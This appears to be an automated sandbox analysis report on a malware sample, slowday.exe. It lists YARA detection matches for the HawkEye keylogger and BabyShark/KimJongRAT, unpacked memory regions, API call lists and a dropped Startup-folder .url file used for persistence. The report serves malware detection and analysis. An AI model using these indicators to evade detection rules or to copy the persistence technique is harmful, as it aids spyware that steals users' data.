            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 30.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 1.2.RegAsm.exe.ec0000.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.3.RegAsm.exe.47c35a8.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.3.RegAsm.exe.43638ed.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.f1834a.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4af0000.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.6771c10.6.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4af0345.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.680dc50.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.6a21c10.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.6985bd0.6.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url, type: DROPPEDMatched rule: URL_File_Local_EXE date = 2017-10-04, author = Florian Roth, description = Detects an .url file that points to a local executable, reference = https://twitter.com/malwareforme/status/915300883012870144, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0044465C appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0044466E appears 40 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00415F19 appears 68 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0044468C appears 72 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00444B90 appears 72 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0041607A appears 132 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 0042F6EF appears 32 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004162C2 appears 174 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004083D6 appears 64 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAACC8 NtUnmapViewOfSection,NtUnmapViewOfSection,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
            Source: slowday.exe, 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReborn Stub.exe" vs slowday.exe
            Source: slowday.exe, 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReborn Stub.exe" vs slowday.exe
            Source: slowday.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\slowday.exeFile created: C:\Users\user\AppData\Roaming\winlogonsJump to behavior
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@24/18@0/1
            Source: 7.3.winlogons.exe.3790000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 8.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 8.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 8.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: 0.3.slowday.exe.3b50000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 8.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 8.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: 8.0.RegAsm.exe.400000.1.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: 8.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 8.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 1.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.2.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 7.3.winlogons.exe.3790000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.3.winlogons.exe.3790000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.0.RegAsm.exe.400000.1.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 8.2.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 8.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 8.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.3.winlogons.exe.3790000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 7.3.winlogons.exe.3790000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
